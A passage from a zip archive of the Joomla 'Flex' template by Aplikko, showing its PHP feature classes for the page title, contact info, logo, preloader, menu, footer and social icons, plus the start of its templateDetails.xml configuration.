define&&define.amd?define(function(){return ne}):"object"==typeof exports?module.exports=ne:window.SmoothScroll=ne}();PK!��//flex/features/title.phpnu&1i�<?php
/**
 * Flex @package Helix Framework
 * Template Name - Flex
 * @author Aplikko http://www.aplikko.com
 * @copyright Copyright (c) 2020 Aplikko
 * @license http://www.gnu.org/licenses/gpl-2.0.html GNU/GPLv2 or later
*/
//no direct access
defined ('_JEXEC') or die ('restricted access');

JHtml::addIncludePath(JPATH_COMPONENT . '/helpers');

class Helix3FeatureTitle {

	private $helix3;

	public function __construct($helix){
		$this->helix3 = $helix;
		$this->position = 'title';
	}

	public function renderFeature() {

		$app = JFactory::getApplication();
		$doc = JFactory::getDocument();
		$menuitem = $app->getMenu()->getActive(); // get the active item
		
		// Include template's params
		$tpl_params 	= JFactory::getApplication()->getTemplate(true)->params;
		$has_lazyload = $tpl_params->get('lazyload', 1);

		if($menuitem) {

			$params 	= $menuitem->params; // get the menu params
			
			if($params->get('enable_page_title', 0)) {

				$page_title  = $menuitem->title;
				$enable_page_title_parallax = $params->get('enable_page_title_parallax', 0);
				
				// Page Title class and responsive (added in Flex 3.9.1)
				$page_title_class = $params->get('page_title_class');
				$page_title_heading = $params->get('page_title_heading', 'h2');
				$page_title_sizes = $params->get('page_title_sizes');
				$page_title_desktop_size = $params->get('page_title_desktop_size', 36);
				$page_title_tablet_size = $params->get('page_title_tablet_size', 34);
				$page_title_mobile_size = $params->get('page_title_mobile_size', 32);
				$page_title_letter_spacing = $params->get('page_title_letter_spacing', 0);
				
				$page_title_height = $params->get('page_title_height');
				$page_title_align = $params->get('page_title_align');
				$page_title_alt = $params->get('page_title_alt');
				$page_subtitle = $params->get('page_subtitle');
				$page_subtitle_size = $params->get('page_subtitle_size', 15);
				$page_title_bg_color = $params->get('page_title_bg_color');
				$page_title_bg_image = $params->get('page_title_bg_image');
				$include_breadcrumbs = $params->get('include_breadcrumbs', 1);
				// Background Image options (added in Flex 3.0):
				$page_title_bg_image_repeat = $params->get('page_title_bg_image_repeat', 'no-repeat');
				$page_title_bg_image_size = $params->get('page_title_bg_image_size', 'cover');
				$page_title_bg_image_attachment = $params->get('page_title_bg_image_attachment', 'fixed');
				$page_title_bg_image_hor_position = $params->get('page_title_bg_image_hor_position', 50);
				$page_title_bg_image_vert_position = $params->get('page_title_bg_image_vert_position', 50);
				// Text color (added in Flex 3.2)
				$page_title_text_color = $params->get('page_title_text_color');
				$page_subtitle_color = $params->get('page_subtitle_color');

				$style = '';
				$title_css = '';
				$title_color = '';
				$subtitle_color = '';
				$page_title_bg = '';
				$parallax = '';
				$page_title_background_class = '';
				$page_title_align_style = '';
				$page_title_size_style = '';
	
				if($page_title_class) {
					$page_title_background_class = ' '. $page_title_class;
				} else {
					if($page_title_bg_image) {
					  $page_title_background_class = '';
					} else {
					  $page_title_background_class = ' gentle-stars text-shadow';
					}
				}
				
				if($enable_page_title_parallax) {
					$parallax = ' parallax_4';
				}
				
				if($page_title_height) {
				    $style .= 'height:' . $page_title_height . 'px;';
				} else {
					$style .= 'padding:60px 0;';
				}
				
				if($page_title_align) {
				    $style .= 'text-align:' . $page_title_align . ';';
				}
			
				if($page_title_bg_color) {
					$page_title_bg = 'background-color:' . $page_title_bg_color . ';';
				}
				
				if($page_title_text_color) {
					$title_color = 'color:' . $page_title_text_color . ';';
				}
				
				if($page_subtitle_color) {
					$subtitle_color = 'color:' . $page_subtitle_color . ';';
				}
				
				//$lazy_output = '';
				if($page_title_bg_image) {
					if (strpos($page_title_bg_image, '://') === false) {
						if($has_lazyload) {
							$style .= 'background-image: url(data:image/gif;base64,R0lGODlhAQABAAAAACH5BAEKAAEALAAAAAABAAEAAAICTAEAOw==);';
							$lazy_output = '<div class="lazyload sp-page-title'. $parallax .'" data-bg="'. JUri::root() . $page_title_bg_image .'">';
						} else {
							$style .= 'background-image:url(' . JURI::root(true) . '/' . $page_title_bg_image . ');';
						}
					} else {
						if($has_lazyload) {
							$style .= 'background-image: url(data:image/gif;base64,R0lGODlhAQABAAAAACH5BAEKAAEALAAAAAABAAEAAAICTAEAOw==);';
							$lazy_output = '<div class="lazyload sp-page-title'. $parallax .'" data-bg="'. $page_title_bg_image .'">';
						} else {
							$style .= 'background-image:url(' . $page_title_bg_image . ');';
						}
					}
					$style .= 'background-repeat:'. $page_title_bg_image_repeat .';';
					$style .= 'background-position:'. $page_title_bg_image_hor_position .'% '. $page_title_bg_image_vert_position .'%;';
					$style .= 'background-size:'. $page_title_bg_image_size .';';
					$style .= 'background-attachment:'. $page_title_bg_image_attachment .';';
				}
				
				// Heading - Title (responsive)
				if($page_title_bg_color) {
					$title_css .= '#sp-title .sp-page-title-wrapper {'. $page_title_bg .'}';
				}
				$title_css .= '#sp-title .sp-page-title-wrapper '. $page_title_heading .'.page_title{font-size:' . $page_title_desktop_size . 'px;line-height:1.2;letter-spacing:'.$page_title_letter_spacing.'px;'. $title_color .'}';
				$title_css .= '@media (min-width: 768px) and (max-width: 991px) {#sp-title .sp-page-title-wrapper '. $page_title_heading .'.page_title {font-size:' . $page_title_tablet_size . 'px;}}';
				$title_css .= '@media (max-width: 767px) {#sp-title .sp-page-title-wrapper '. $page_title_heading .'.page_title{ font-size:' . $page_title_mobile_size . 'px;}}';
				$doc->addStyleDeclaration($title_css);
			
				// Add styles
				$css = '.sp-page-title, .sp-page-title-no-img {'. $style .'}';
				if($page_title_bg_color) {
					$css .= '#sp-title .sp-page-title-wrapper .sp-page-title-no-img {'. $page_title_bg .'}';
				}
				$css .= '#sp-title .sp-page-title-wrapper .page_subtitle{font-size:' . $page_subtitle_size . 'px;line-height:1.3;'. $subtitle_color .'}';		 
				$doc->addStyleDeclaration($css);
				

				if($page_title_alt) {
					$page_title = $page_title_alt;
				}

				$output = '';

				
				
				if($page_title_bg_image) {
					
					$output .= '<div class="sp-page-title-wrapper'. $page_title_background_class .'">';
					
					// Lazy Loading for background image
					if($has_lazyload) {
						$output .= $lazy_output;
					} else {
						$output .= '<div class="sp-page-title'. $parallax .'">';
					}
				} else {
					$output .= '<div class="sp-page-title-wrapper">';
					$output .= '<div class="sp-page-title-no-img'. $parallax . $page_title_background_class .'">';
				}
				$output .= '<div class="container">';
				
				$output .= '<'. $page_title_heading .' class="page_title" itemprop="headline">'. $page_title .'</'. $page_title_heading .'>';
				
				if($page_subtitle) {
					$output .= '<h3 class="page_subtitle">'. $page_subtitle .'</h3>';
				}

				if($include_breadcrumbs == 1) {
					$output .= '<jdoc:include type="modules" name="breadcrumb" style="none" />';
				}

				$output .= '</div>';
				$output .= '</div>';

				$output .= '</div>';
				return $output;

			}
		}
	}
}
PK!g�fSSflex/features/contact.phpnu&1i�<?php
/**
 * Flex @package Helix3 Framework
 * Template Name - Flex
 * @author Aplikko http://www.aplikko.com
 * @copyright Copyright (c) 2018 Aplikko
 * @license http://www.gnu.org/licenses/gpl-2.0.html GNU/GPLv2 or later
*/
//no direct access
defined ('_JEXEC') or die ('restricted access');

class Helix3FeatureContact {

	private $helix3;

	public function __construct($helix3){
		$this->helix3 = $helix3;
		$this->position = $this->helix3->getParam('contact_position');
	}
	
	public function renderFeature() {
		
		$this->helix3->getParam('contact_phone_icon') != '' ? $contact_phone_icon = '<i class="'.$this->helix3->getParam('contact_phone_icon').'" aria-hidden="true"></i> ' : $contact_phone_icon = '<i class="pe pe-7s-headphones" aria-hidden="true"></i> ';
		$this->helix3->getParam('contact_mobile_icon') != '' ? $contact_mobile_icon = '<i class="'.$this->helix3->getParam('contact_mobile_icon').'" aria-hidden="true"></i> ' : $contact_mobile_icon = '<i class="pe pe-7s-phone" aria-hidden="true"></i> ';
		$this->helix3->getParam('contact_email_icon') != '' ? $contact_email_icon = '<i class="'.$this->helix3->getParam('contact_email_icon').'" aria-hidden="true"></i> ' : $contact_email_icon = '<i class="pe pe-7s-mail" aria-hidden="true"></i> ';
		$this->helix3->getParam('contact_time_icon') != '' ? $contact_time_icon = '<i class="'.$this->helix3->getParam('contact_time_icon').'" aria-hidden="true"></i> ' : $contact_time_icon = '<i class="pe pe-7s-timer" aria-hidden="true"></i> ';
	   

		if($this->helix3->getParam('enable_contactinfo')) {

			$output = '<ul class="sp-contact-info">';
			if($this->helix3->getParam('contact_phone')) $output .= '<li class="sp-contact-phone">'. $contact_phone_icon .'<a href="tel:' . str_replace(' ', '', $this->helix3->getParam('contact_phone')) . '">' . $this->helix3->getParam('contact_phone') . '</a></li>';
			if($this->helix3->getParam('contact_mobile')) $output .= '<li class="sp-contact-mobile">'. $contact_mobile_icon .'<a href="tel:'. str_replace(' ', '', $this->helix3->getParam('contact_mobile')) .'">' . $this->helix3->getParam('contact_mobile') . '</a></li>';
			// Email + Email cloaking:
			if($this->helix3->getParam('enable_emailcloaking') == 1) {
				if($this->helix3->getParam('contact_email')) 
				$output .= '<li class="sp-contact-email">'. $contact_email_icon . JHtml::_('email.cloak', $this->helix3->getParam('contact_email')).'</li>';
			} else {
				if($this->helix3->getParam('contact_email')) 
				$output .= '<li class="sp-contact-email">'. $contact_email_icon .'<a href="mailto:'. $this->helix3->getParam('contact_email') .'">' . $this->helix3->getParam('contact_email') . '</a></li>';
				
			}	
			if($this->helix3->getParam('contact_time')) $output .= '<li class="sp-contact-time">'. $contact_time_icon . $this->helix3->getParam('contact_time') . '</li>';
			$output .= '</ul>';

			return $output;
		}
		
	}    
}PK!�0F�||flex/features/logo.phpnu&1i�<?php
/**
 * Flex @package Helix3 Framework
 * Template Name - Flex
 * @author Aplikko http://www.aplikko.com
 * @copyright Copyright (c) 2019 Aplikko
 * @license http://www.gnu.org/licenses/gpl-2.0.html GNU/GPLv2 or later
*/
//no direct accees
defined ('_JEXEC') or die('restricted access');
 
class Helix3FeatureLogo {

	private $helix3;
	public $position;

	public function __construct( $helix3 ){
		$this->helix3 = $helix3;
		$this->position = $this->helix3->getParam('logo_position', 'logo');
		$this->load_pos = $this->helix3->getParam('logo_load_pos');
	}

	public function renderFeature() {

		$doc = JFactory::getDocument();
		$extention = '';
		//Retina Image
		if( $this->helix3->getParam('logo_type') == 'image' ) {
			jimport('joomla.image.image');

			if( $this->helix3->getParam('logo_image') ) {
				$path = JPATH_ROOT . '/' . $this->helix3->getParam('logo_image');
			} else {
				$path = JPATH_ROOT . '/templates/' . $this->helix3->getTemplate() . '/images/presets/' . $this->helix3->Preset() . '/logo.png';
			}
			
			// Scroll Logo (for Sticky header)
			if ($this->helix3->getParam('sticky_logo')) {
				$scroll_path = JPATH_ROOT . '/' . $this->helix3->getParam('sticky_logo');
			} else {
				$scroll_path = '';
			}

			// Detecting SVG 
			$extention = explode('.', $this->helix3->getParam('logo_image'));
 			$extention = end($extention);
			
			// Fix for SVG image for logo
			if ($extention != 'svg') {
			
				// Other images (jpg, png, gif)
				if(file_exists($path)) {
					$image = new JImage( $path );
					$width 	= $image->getWidth();
					$height = $image->getHeight();
				} else {
					$width 	= '';
					$height = '';
				}	
				
			}
			
			/* From Flex 3.2: fix for Logo container. Logo graphic shouldn't go outside "Logo" container. */
			$header_container = ( $height < $this->helix3->getParam('header_height') ) ? ' style="max-width:' . $width . 'px;max-height:' . $height . 'px;"' : '';
			
		}
		
		// Detecting SVG  for Sticky Logo
		$svg_sticky = explode('.', $this->helix3->getParam('sticky_logo'));
		$svg_sticky = end($svg_sticky);

		$html  = '';
		$custom_logo_class = '';
		$sitename = JFactory::getApplication()->get('sitename');

		if( $this->helix3->getParam('mobile_logo') ) {
			$custom_logo_class = ' hidden-xs';
		}

		$sticky_logo_class = ($this->helix3->getParam('sticky_logo')) ? ' has-sticky-logo' : '';

		if( $this->helix3->getParam('logo_type') == 'image' ) {
			if( $this->helix3->getParam('logo_image') ) {
				$html .= '<a class="logo" href="' . JURI::base(true) . '/">';
				
				if ($extention != 'svg') {
				  $html .= '<img'. $header_container .' class="sp-default-logo'. $custom_logo_class . $sticky_logo_class .'" src="' . $this->helix3->getParam('logo_image') . '" alt="'. $sitename .'">';
				} else {
					$html .= '<img class="'. $sticky_logo_class .'" style="width:100%;height:100%;" src="' . $this->helix3->getParam('logo_image') . '" alt="'. $sitename .'">';
				}
				
			// Detecting SVG for retina
			$extention_2x = explode('.', $this->helix3->getParam('logo_image_2x'));
 			$extention_2x = end($extention_2x);
		
				if ($extention_2x != 'svg') {
					if( $this->helix3->getParam('logo_image_2x') ) {
						$html .= '<img'. $header_container .' class="sp-retina-logo'. $custom_logo_class . $sticky_logo_class .'" src="' . $this->helix3->getParam('logo_image_2x') . '" alt="'. $sitename .'">';
					}
				} else {
					$html .= '<img class="'. $sticky_logo_class .'" style="max-width:100%;height:' . $height . 'px;" src="' . $this->helix3->getParam('logo_image_2x') . '" alt="'. $sitename .'">';
				}
				
				/* Sticky Logo */
				if ($this->helix3->getParam('sticky_header') == 1) {
					if ($svg_sticky != 'svg') {
						if ($this->helix3->getParam('sticky_logo')) {
							$html .= '<img class="sp-sticky-logo'. $custom_logo_class .'" src="' . $this->helix3->getParam('sticky_logo') . '" alt="'. $sitename .'">';
						}
					} else {
						/* If Sticky Logo is SVG graphic*/
						$html .= '<img class="sp-sticky-logo'. $custom_logo_class .'" src="' . $this->helix3->getParam('sticky_logo') . '" alt="'. $sitename .'">';
					}
				}
				
				if( $this->helix3->getParam('mobile_logo') ) {
					$html .= '<img class="sp-default-logo visible-xs-block'. $sticky_logo_class .'" src="' . $this->helix3->getParam('mobile_logo') . '" alt="'. $sitename .'">';
				}

				$html .= '</a>';
			} else {
				$html .= '<a class="logo" href="' . JURI::base(true) . '/">';
				$html .= '<img class="sp-default-logo'. $custom_logo_class . $sticky_logo_class .'" src="' . $this->helix3->getTemplateUri() . '/images/presets/' . $this->helix3->Preset() . '/logo.png" alt="'. $sitename .'">';
				$html .= '<img style="max-width:' . $width . 'px;max-height:' . $height . 'px;" class="sp-retina-logo'. $custom_logo_class . $sticky_logo_class .'" src="' . $this->helix3->getTemplateUri() . '/images/presets/' . $this->helix3->Preset() . '/logo@2x.png" alt="'. $sitename .'">';
				
				/* Sticky Logo */
				if ($this->helix3->getParam('sticky_header') == 1) {
					if ($svg_sticky != 'svg') {
						if ($this->helix3->getParam('sticky_logo')) {
							$html .= '<img class="sp-sticky-logo'. $custom_logo_class .'" src="' . $this->helix3->getParam('sticky_logo') . '" alt="'. $sitename .'">';
						}
					} else {
						/* If Sticky Logo is SVG graphic*/
						$html .= '<img class="sp-sticky-logo'. $custom_logo_class .'" style="max-width:100%;" src="' . $this->helix3->getParam('sticky_logo') . '" alt="'. $sitename .'">';
					}
				}

				/* Mobile Logo */
				if( $this->helix3->getParam('mobile_logo') ) {
					$html .= '<img class="sp-default-logo visible-xs-block'. $sticky_logo_class .'" src="' . $this->helix3->getParam('mobile_logo') . '" alt="'. $sitename .'">';
				}

				$html .= '</a>';
			}
			
			
			
		} else {
			if( $this->helix3->getParam('logo_text') ) {
				$html .= '<h1 class="logo"> <a href="' . JURI::base(true) . '/">' . $this->helix3->getParam('logo_text') . '</a></h1>';
			} else {
				$html .= '<h1 class="logo"> <a href="' . JURI::base(true) . '/">' . $sitename . '</a></h1>';
			}

			if( $this->helix3->getParam('logo_slogan') ) {
				$html .= '<p class="logo-slogan">' . $this->helix3->getParam('logo_slogan') . '</p>';
			}
		}
		
		return $html;
	}
}
PK!s��~��flex/features/preloader.phpnu&1i�<?php
/**
 * Flex @package Helix3 Framework
 * Template Name - Flex
 * @author Aplikko http://www.aplikko.com
 * @copyright Copyright (c) 2018 Aplikko
 * @license http://www.gnu.org/licenses/gpl-2.0.html GNU/GPLv2 or later
*/
//no direct access
defined ('_JEXEC') or die ('restricted access');

class Helix3FeaturePreloader {

	private $helix3;

	public function __construct($helix){
		$this->helix3 = $helix;
		$this->position = 'helixpreloader';
	}

	public function renderFeature() {

		$app = JFactory::getApplication();
		//Load Helix
		$helix3_path = JPATH_PLUGINS . '/system/helix3/core/helix3.php';
		if (file_exists($helix3_path)) {
			require_once($helix3_path);
			$getHelix3 = helix3::getInstance();
		} else {
			die('Please install and activate helix plugin');
		}

		$output = '';
		if ($getHelix3->getParam('preloader')) { 
           	//Pre-loader -->
            $output .= '<div class="sp-pre-loader">';
                if ($getHelix3->getParam('preloader_animation') == 'double-loop') {
                    // Bubble Loop loader 
                    $output .= '<div class="sp-loader-bubble-loop"></div>';
                } elseif ($getHelix3->getParam('preloader_animation') == 'wave-two') {
                    // Audio Wave 2 loader
                    $output .= '<div class="wave-two-wrap">';
                        $output .= '<ul class="wave-two">';
                            $output .= '<li></li>';
                            $output .= '<li></li>';
                            $output .= '<li></li>';
                            $output .= '<li></li>';
                            $output .= '<li></li>';
                            $output .= '<li></li>';
                        $output .= '</ul>'; //<!-- /.Audio Wave 2 loader -->
                    $output .= '</div>'; // <!-- /.wave-two-wrap -->

                } elseif ($getHelix3->getParam('preloader_animation') == 'audio-wave') {
                    // Audio Wave loader
                    $output .= '<div class="sp-loader-audio-wave"> </div>';
                } elseif ($getHelix3->getParam('preloader_animation') == 'circle-two') {
                    // Circle two Loader
                    $output .= '<div class="circle-two">'; 
                        $output .= '<span></span>'; 
                    $output .= '</div>'; // /.Circle two loader
                } elseif ($getHelix3->getParam('preloader_animation') == 'flip') {
                    // Flip Loader
                    $output .= '<div class="loader-flip">'; 
                        //$output .= '<i class="fa fa-balance-scale"></i>'; 
                    $output .= '</div>';
                } elseif ($getHelix3->getParam('preloader_animation') == 'clock') {
                    //Clock loader
                    $output .= '<div class="sp-loader-clock"></div>';
                } elseif ($getHelix3->getParam('preloader_animation') == 'logo') {

                    if ($getHelix3->getParam('logo_image')) {
                        $logo = JUri::root() . '/' . $getHelix3->getParam('logo_image');
                    } else {
                        $logo = JUri::root() . '/templates/' . $app->getTemplate() . '/images/presets/' . $getHelix3->Preset() . '/logo.png';
                    }

                    // Line loader with logo
                    $output .= '<div class="sp-loader-with-logo">';
                        $output .= '<div class="logo animated fadeIn">';
                            $output .= '<img src="' . $logo . '" alt="logo">';
                        $output .= '</div>';
                        $output .= '<div class="line" id="line-load"></div>';
                    $output .= '</div>'; // /.Line loader with logo

                } else {
                    // Circle loader
                    $output .= '<div class="sp-loader-circle"></div>'; // /.Circular loader
                }
            $output .= '</div>'; // /.Pre-loader
            
        } // if enable preloader

        echo $output;
	} //renderFeature
}PK!�,�~ggflex/features/menu.phpnu&1i�<?php
/**
 * Flex @package Helix3 Framework
 * Template Name - Flex
 * @author Aplikko http://www.aplikko.com
 * @copyright Copyright (c) 2020 Aplikko
 * @license http://www.gnu.org/licenses/gpl-2.0.html GNU/GPLv2 or later
*/
//no direct access
defined ('_JEXEC') or die ('restricted access');

class Helix3FeatureMenu {

	private $helix3;

	public function __construct($helix3){
		$this->helix3 = $helix3;
		$this->position = 'menu';
	}

	public function renderFeature() {

		$menu_type = $this->helix3->getParam('menu_type');
		$this->helix3->getParam('offcanvas_icon') != '2' ? $offcanvas_icon_class = 'fas fa-bars' : $offcanvas_icon_class = 'pe pe-7s-menu';

		ob_start();
		
		if($menu_type == 'mega_offcanvas') { ?>
			<div class="sp-megamenu-wrapper">
				<a id="offcanvas-toggler" href="#" aria-label="<?php echo JText::_('HELIX_MENU'); ?>"><i class="<?php echo $offcanvas_icon_class; ?>" aria-hidden="true" title="<?php echo JText::_('HELIX_MENU'); ?>"></i></a>
				<?php $this->helix3->loadMegaMenu('hidden-sm hidden-xs'); ?>
			</div>
		<?php } else if ($menu_type == 'mega') { ?>
			<div class="sp-megamenu-wrapper">
				<a id="offcanvas-toggler" class="visible-sm visible-xs" href="#" aria-label="<?php echo JText::_('HELIX_MENU'); ?>"><i class="<?php echo $offcanvas_icon_class; ?>" aria-hidden="true" title="<?php echo JText::_('HELIX_MENU'); ?>"></i></a>
				<?php $this->helix3->loadMegaMenu('hidden-sm hidden-xs'); ?>
			</div>
		<?php } else { ?>
        	<div class="sp-megamenu-wrapper">
                <a id="offcanvas-toggler" href="#" aria-label="<?php echo JText::_('HELIX_MENU'); ?>"><i style="font-size:28px;width:80px;" class="<?php echo $offcanvas_icon_class; ?>" aria-hidden="true" title="<?php echo JText::_('HELIX_MENU'); ?>"></i></a>
                <?php $this->helix3->loadMegaMenu('hidden'); ?>
            </div>
		<?php }

		return ob_get_clean();
	}    
}PK!%C�zzflex/features/footer.phpnu&1i�<?php
/**
 * Flex @package Helix3 Framework
 * Template Name - Flex
 * @author Aplikko http://www.aplikko.com
 * @copyright Copyright (c) 2018 Aplikko
 * @license http://www.gnu.org/licenses/gpl-2.0.html GNU/GPLv2 or later
*/
//no direct access
defined ('_JEXEC') or die ('restricted access');

class Helix3FeatureFooter {

	private $helix3;

	public function __construct($helix3){
		$this->helix3 = $helix3;
		$this->position = $this->helix3->getParam('copyright_position');
		$this->load_pos = $this->helix3->getParam('copyright_load_pos');
	}

	public function renderFeature() {

		if($this->helix3->getParam('enabled_copyright')) {
			$output = '';
			//Copyright
			if( $this->helix3->getParam('copyright') ) {
				$output .= '<span class="sp-copyright">' . str_ireplace('{year}',date('Y'), $this->helix3->getParam('copyright')) . '</span>';
			}
			
			return $output;
		}
		
	}    
}PK!ߋ�Z��flex/features/social.phpnu&1i�<?php
/**
 * Flex @package Helix3 Framework
 * Template Name - Flex
 * @author Aplikko http://www.aplikko.com
 * @copyright Copyright (c) 2020 Aplikko
 * @license http://www.gnu.org/licenses/gpl-2.0.html GNU/GPLv2 or later
*/
//no direct access
defined ('_JEXEC') or die ('restricted access');

class Helix3FeatureSocial {

	private $helix3;
	public $position;

	public function __construct( $helix3 ){
		$this->helix3 = $helix3;
		$this->position = $this->helix3->getParam('social_position');
		$this->load_pos = $this->helix3->getParam('social_load_pos');
	}

	public function renderFeature() {

		$facebook 	= $this->helix3->getParam('facebook');
		$twitter  	= $this->helix3->getParam('twitter');
		$googleplus = $this->helix3->getParam('googleplus');
		$instagram  = $this->helix3->getParam('instagram');
		$pinterest 	= $this->helix3->getParam('pinterest');
		$youtube 	= $this->helix3->getParam('youtube');
		$linkedin 	= $this->helix3->getParam('linkedin');
		$dribbble 	= $this->helix3->getParam('dribbble');
		$behance 	= $this->helix3->getParam('behance');
		$skype 		= $this->helix3->getParam('skype');
		$whatsapp 	= $this->helix3->getParam('whatsapp');
		$flickr 		= $this->helix3->getParam('flickr');
		$vk 			= $this->helix3->getParam('vk');
		$custom 		= $this->helix3->getParam('custom');

		if( $this->helix3->getParam('show_social_icons') && ( $facebook || $twitter || $googleplus || $instagram || $pinterest || $youtube || $linkedin || $dribbble || $behance || $skype || $whatsapp || $flickr || $vk ) ) {
			$html  = '<ul class="social-icons">';

			if( $facebook ) {
				$html .= '<li><a target="_blank" href="'. $facebook .'" aria-label="facebook"><i class="fab fa-facebook-f" aria-hidden="true"></i></a></li>';
			}
			if( $twitter ) {
				$html .= '<li><a target="_blank" href="'. $twitter .'" aria-label="twitter"><i class="fab fa-twitter" aria-hidden="true"></i></a></li>';
			}
			if( $googleplus ) {
				$html .= '<li><a target="_blank" href="'. $googleplus .'" aria-label="GooglePlus"><i class="fab fa-google-plus-g" aria-hidden="true"></i></a></li>';
			}
          	if( $instagram ) {
				$html .= '<li ><a target="_blank" href="'. $instagram .'" aria-label="Instagram"><i class="fab fa-instagram" aria-hidden="true"></i></a></li>';
			}
			if( $pinterest ) {
				$html .= '<li><a target="_blank" href="'. $pinterest .'" aria-label="Pinterest"><i class="fab fa-pinterest" aria-hidden="true"></i></a></li>';
			}
			if( $youtube ) {
				$html .= '<li><a target="_blank" href="'. $youtube .'" aria-label="Youtube"><i class="fab fa-youtube" aria-hidden="true"></i></a></li>';
			}
			if( $linkedin ) {
				$html .= '<li><a target="_blank" href="'. $linkedin .'" aria-label="LinkedIn"><i class="fab fa-linkedin" aria-hidden="true"></i></a></li>';
			}
			if( $dribbble ) {
				$html .= '<li><a target="_blank" href="'. $dribbble .'" aria-label="Dribbble"><i class="fab fa-dribbble" aria-hidden="true"></i></a></li>';
			}
			if( $behance ) {
				$html .= '<li><a target="_blank" href="'. $behance .'" aria-label="Behance"><i class="fab fa-behance" aria-hidden="true"></i></a></li>';
			}
			if( $flickr ) {
				$html .= '<li><a target="_blank" href="'. $flickr .'" aria-label="Flickr"><i class="fab fa-flickr" aria-hidden="true"></i></a></li>';
			}
			if( $vk ) {
				$html .= '<li><a target="_blank" href="'. $vk .'" aria-label="VK"><i class="fab fa-vk" aria-hidden="true"></i></a></li>';
			}
			if( $skype ) {
				$html .= '<li><a href="skype:'. $skype .'?chat" aria-label="Skype"><i class="fab fa-skype" aria-hidden="true"></i></a></li>';
			}
			if( $whatsapp ) {
				$html .= '<li><a href="whatsapp://send?abid='. $whatsapp .'&text=Hi" aria-label="WhatsApp"><i class="fab fa-whatsapp" aria-hidden="true"></i></a></li>';
			}

			if( $custom ) {
				$explt_custom = explode(' ', $custom);
				$html .= '<li><a target="_blank" href="'. $explt_custom[1] .'"><i class="fab '. $explt_custom[0] .'"></i></a></li>';
			}

			$html .= '</ul>';

			return $html;
		}

	}
}PK!(��}w�w�flex/templateDetails.xmlnu&1i�<?xml version="1.0" encoding="utf-8"?>
<extension version="3.5" type="template" client="site" method="upgrade">
    <name>Flex</name>
    <creationDate>October 2020</creationDate>
    <author>Aplikko.com</author>
    <authorEmail>aplikko@gmail.com</authorEmail>
    <authorUrl>http://www.aplikko.com</authorUrl>
    <copyright>Copyright (C) 2020 Aplikko.com. All rights reserved.</copyright>
    <license>http://www.gnu.org/licenses/gpl-2.0.html GPLv2 or later</license>
    <version>3.9.3</version>
    <description>Flex - Multipurpose Template from Aplikko. Version 3.9.3</description>
    <languages>
        <language tag="en-GB">en-GB.tpl_flex.ini</language>
    </languages>
    <positions>
        <position>title</position>
        <position>top1</position>
        <position>top2</position>
        <position>top3</position>
        <position>logo</position>
        <position>menu</position>
		<position>topsearch</position>
        <position>search</position>
        <position>slide</position>
        <position>user1</position>
        <position>user2</position>
        <position>user3</position>
        <position>user4</position>
        <position>left</position>
        <position>right</position>
        <position>feature</position>
        <position>slider</position>
		<position>above-component</position>
		<position>below-component</position>
        <position>position1</position>
        <position>position2</position>
        <position>position3</position>
        <position>position4</position>
        <position>position5</position>
        <position>position6</position>
        <position>position7</position>
        <position>position8</position>
        <position>bottom1</position>
        <position>bottom2</position>
        <position>bottom3</position>
        <position>bottom4</position>
        <position>breadcrumb</position>
        <position>footer1</position>
        <position>footer2</position>
		<position>footer3</position>
        <position>comingsoon</position>
        <position>offcanvas</position>
		<position>myaccount</position>
		<position>shoppingcart</position>
        <position>pagebuilder</position>
        <position>404</position>
        <position>debug</position>
    </positions>

   <files>
        <file>index.php</file>
        <file>template_preview.png</file>
        <file>template_thumbnail.png</file>
        <file>templateDetails.xml</file>
        <file>error.php</file>
        <file>offline.php</file>
        <file>component.php</file>
        <file>comingsoon.php</file>
        <folder>css/</folder>
        <folder>features/</folder>
        <folder>fonts/</folder>
        <folder>html/</folder>
        <folder>images/</folder>
        <folder>js/</folder>
        <folder>layout/</folder>
        <folder>less/</folder>
        <folder>sppagebuilder/</folder>
		<folder>webfonts/</folder>
    </files>
    <config>
        <fields name="params">
            <fieldset name="basic" addfieldpath="/plugins/system/helix3/fields">

                <field type="asset" />
                <field type="group" title="HELIX_GLOBAL" />
				
                <field name="preloader" class="parent preloader" type="radio" default="0" label="HELIX_PRELOADER" description="HELIX_PRELOADER_DESC">
                    <option value="1">HELIX_YES</option>
                    <option value="0">HELIX_NO</option>
                </field>
				
                <field name="preloader_animation" class="child preloader preloader_1" type="list" default="circle" label="HELIX_PRELOADER_ANIMATION" description="HELIX_PRELOADER_ANIMATION_DESC">
                    <option value="circle">HELIX_PRELOADER_ANIMATION_CIRCLE</option>
                    <option value="double-loop">HELIX_PRELOADER_ANIMATION_DOUBLE_LOOP</option>
                    <option value="wave-two">HELIX_PRELOADER_ANIMATION_WAVE_TWO</option>
                    <option value="audio-wave">HELIX_PRELOADER_ANIMATION_AUDIO_WAVE</option>
                    <option value="circle-two">HELIX_PRELOADER_ANIMATION_CIRCLE_TWO</option>
					<option value="flip">HELIX_PRELOADER_ANIMATION_FLIP</option>
                    <option value="clock">HELIX_PRELOADER_ANIMATION_CLOCK</option>
                    <option value="logo">HELIX_PRELOADER_ANIMATION_LOGO</option>
                </field>
				
                <field name="preloader_bg" class="child preloader preloader_1" type="colorpicker" default="rgba(255,255,255,0.8)" label="HELIX_PRELOADER_BG_COLOR" description="HELIX_PRELOADER_BG_COLOR_DESC" />
                <field name="preloader_tx" class="child preloader preloader_1" type="color" default="#333333" label="HELIX_PRELOADER_TX_COLOR" description="HELIX_PRELOADER_TX_COLOR_DESC" />

                <field name="favicon" type="media" preview="true" label="HELIX_FAVICON" description="HELIX_FAVICON_DESC" />

                <!--Layout Type-->
                <field type="group" title="HELIX_BOXED_LAYOUT" />
                <field name="boxed_layout" class="parent boxed_layout" type="radio" default="0" label="HELIX_ENABLE_BOXED_LAYOUT" description="HELIX_ENABLE_BOXED_LAYOUT_DESC">
                    <option value="1">HELIX_YES</option>
                    <option value="0">HELIX_NO</option>
                </field>
				
				<field name="boxed_layout_width" type="apslide" class="child boxed_layout boxed_layout_1" default="1170" data-content="data-content" data-slider-range="800,1440" data-slider-step="10" append="px" label="FLEX_BOXED_LAYOUT_WIDTH" description="FLEX_BOXED_LAYOUT_WIDTH_DESC" />
				<field name="boxed_layout_spacing" type="apslide" class="child boxed_layout boxed_layout_1" data-content="data-content" default="0" data-slider-range="0,100" data-slider-step="1" label="FLEX_BOXED_LAYOUT_SPACING" append="px" description="FLEX_BOXED_LAYOUT_SPACING_DESC" />
				
